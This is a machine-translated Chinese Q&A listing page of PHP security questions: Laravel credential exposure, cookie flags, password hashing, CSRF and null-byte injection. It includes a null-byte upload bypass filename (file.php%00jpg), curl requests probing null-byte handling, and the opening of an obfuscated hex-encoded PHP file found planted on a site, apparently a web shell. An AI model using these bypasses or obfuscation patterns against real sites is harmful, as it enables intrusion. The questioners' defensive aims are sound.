SECURITY

php - 如何保护存储在 Laravel 环境文件中的数据库凭据？

我最近为Laravel切换到基于环境的应用程序部署，我决定使用$_ENV将我的本地和生产服务器的凭据存储在.env文件中，但是我发现调试打开时出现异常抛出的错误显示暴露数据库凭据的环境变量。现在我确定调试将始终在生产中关闭，因为这是我的默认设置，然后我在我的本地环境的本地文件夹中覆盖它但是，if以某种方式调试在生产环境中打开并且用户强制执行404异常时，他们需要做的就是向下阅读页面，直到他们在普通View中看到环境变量公开凭据。在文档中，它表示任何“真实”应用程序的最佳做法是使数据库凭据远离实际配置。我在这里可能有点偏执。有什么方法可以限制laravel调试屏幕显示的内容吗？

凭据 Laravel section strong php security

php - 如何在 laravel 的 cookie 上设置安全标志

我想在通过HTTPS访问内容时为cookie数据设置安全标志。cookie用于整个应用程序，因此需要全局配置以保护所有cookie。最佳答案您需要使用session_set_cookie_params覆盖默认设置，将$secure标志设置为true，voidsession_set_cookie_params(int$lifetime[,string$path[,string$domain[,bool$secure=false[,bool$httponly=false]]]])更多信息请访问php.net在laravel中你需要修

何在 laravel section cookie code php security cookies laravel-5

php - 使用 Zend_Auth 保护所有 Controller

我将如何全局保护我的所有Controller(我的登录Controller除外)以确保我的应用程序在所有点都是安全的(没有隐藏的ajax调用后门等)。我想我可以把它放在我的Bootstrap文件中，但这感觉不对吗？我试图避免向每个Controller添加任何代码。建议？最佳答案编辑:这是对@singles回复的补充。您必须了解有两种不同的情况。Auth和Acl。Auth告诉您谁是用户，例如，您可以将没有Auth的用户重定向到您的登录Controller，并在登录后设置auth身份。然后Acl系统根据Auth数据(可以是用户ID或

Controller Zend_Auth strong request php security zend-framework

php - 散列密码，从 splinter 的方法到现在最安全的方法

我脑子里只有一个简单的社区问题。曾几何时，当我开始编程时，我使用md5来散列密码，后来发现md5很容易被破解，我应该使用salt来确保它的安全。我对md5没有信心，想使用sha1、sha256、sha512加密。但问题是现在我有加密形式的密码md5("password"+"salt")当时我不知道用户的密码，所以我做了什么sha1(md5("password"+"salt"))现在，在这个领域工作了几次之后，我发现sha1也不太安全并且已经损坏，我应该做的是使用bcrypt()来确保密码安全。所以从现在开始我将使用crypt(sha1(md5("password"+"salt")))密

splinter php password strong hash security passwords

php - 使用更多 cookie 而不仅仅是 session 哈希进行身份验证的原因是什么？

我经常在使用公告板软件的社区中闲逛。我正在查看此软件在我的浏览器中保存为cookie的内容。如您所见，它节省了6个cookie。其中，我认为对身份验证重要的是:ngisessionhash:当前session的哈希值ngipassword:密码的哈希值(可能不是普通密码)nguserid:用户的ID当然，这些都是我的假设。我不确定ngilastactivity和ngilastvisit是否出于同样的原因使用。我的问题是:为什么要使用所有这些cookie进行身份验证？我的猜测是，也许生成session哈希会很容易，因此使用hashedpassword和userid可以增加安全性，但是co

不仅 session cookie section strong php security authentication session-cookies spoofing

php - 是什么导致请求中的空字节值被过滤掉？

尝试针对nullbytepoisoning强化PHP网络应用程序时，我注意到我有一段时间实际上在我的请求中发送了一个空字节。使用cURL，我终于找到了一种在我的请求中发送空字节的方法，但我注意到一些非常奇怪的事情:没有任何值包含空字节的请求参数到达我的PHP应用程序。作为概念验证，我在我的服务器上创建了一个名为test.php的文件:以下是对该脚本的一些请求的结果:>curl'http://localhost/test.php?foo=bar&baz=nu%00ll'{"foo":"bar"}>curl'http://localhost/test.php?foo=bar&b%00az=

php 是 code section pre curl security

php - 分发文件使收件人无法阅读

我有一个程序附带了一个我不希望最终用户直接读取的数据文件。当它在用户的硬盘上时，它始终是加密的(即使我的程序正在使用它)。但是，我无法将数据文件包含在安装程序中，因为它们很容易提取。我已经尝试过加密功能，但它们似乎无法正常工作。所以我试图找到一种分发文件的方法，以便用户在分发文件时无法阅读它。我想到了各种方法来通过HTTP以加密形式通过PHP下载文件，但是如果不发送加密key就很难做到这一点。更不用说，我在HTTP问题上不是很有经验。我想出了一些解决这个问题的想法，但要么它们不起作用，要么它们非常复杂。我宁愿想出一个不太复杂的解决方案。这不必太安全，但它应该经得起HTTP嗅探器的攻击。

收件人收件 section 的分发 php security http encryption distribution

php - 如何在PHP中有效防止跨站请求伪造(CSRF)

我正在努力阻止CSRF在php通过以下方式:A$_SESSION['token']在每一页的开头生成。我已经知道使用$_COOKIES这是完全错误的，因为它们是针对每个请求自动发送的。在每个,以下输入:">已附加。$_SESSION['token'];使用$_POST['t']验证现在我有几个小问题:这是防止CSRF的好方法吗？如果不是，请解释。当打开另一个页面时设置相同的$_SESSION变量，前一个(仍然打开的)页面变得无效，如何防止这种情况？对于表单这个方法很清楚，但是如何处理正常的链接呢？是否也有必要将token附加到每个链接？非常感谢您。最佳答案

何在 CSRF code token section php security session session-variables

php - 上传表单中的空字节注入(inject)

我正在尝试在上传表单上重现空字节注入(inject)攻击。我有这段代码:Fileuploaded';elseecho'Cannotupload';}elseecho'Thisisnotavalidfile/b>';?>我正在尝试上传一个这样命名的文件:file.php%00jpg这样它将绕过substr()并将作为file.php上传，因为move_uploaded_file()应该停止在空字节(%00)。问题是上传的文件在服务器上的名称不是file.php而是file.php%00jpg(可以通过输入/file.php%2500jpg在url栏中)。看起来move_uploaded_

inject php file section 39 forms security exploit

php - 在网站上发现奇怪的 index.php

我在我的网站上发现了一个奇怪的模糊文件“Index.php”。我不知道是谁将它放在我的页面上，但我想了解它的作用。首先通过用十六进制值替换字符来隐藏文件。${${"\x47L\x4fB\x41\x4cS"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4cO\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4cO\x42\x41LS"}["\x64\x78\x

站上 php 34 x4 x6 security web

167 168 169170171 172 173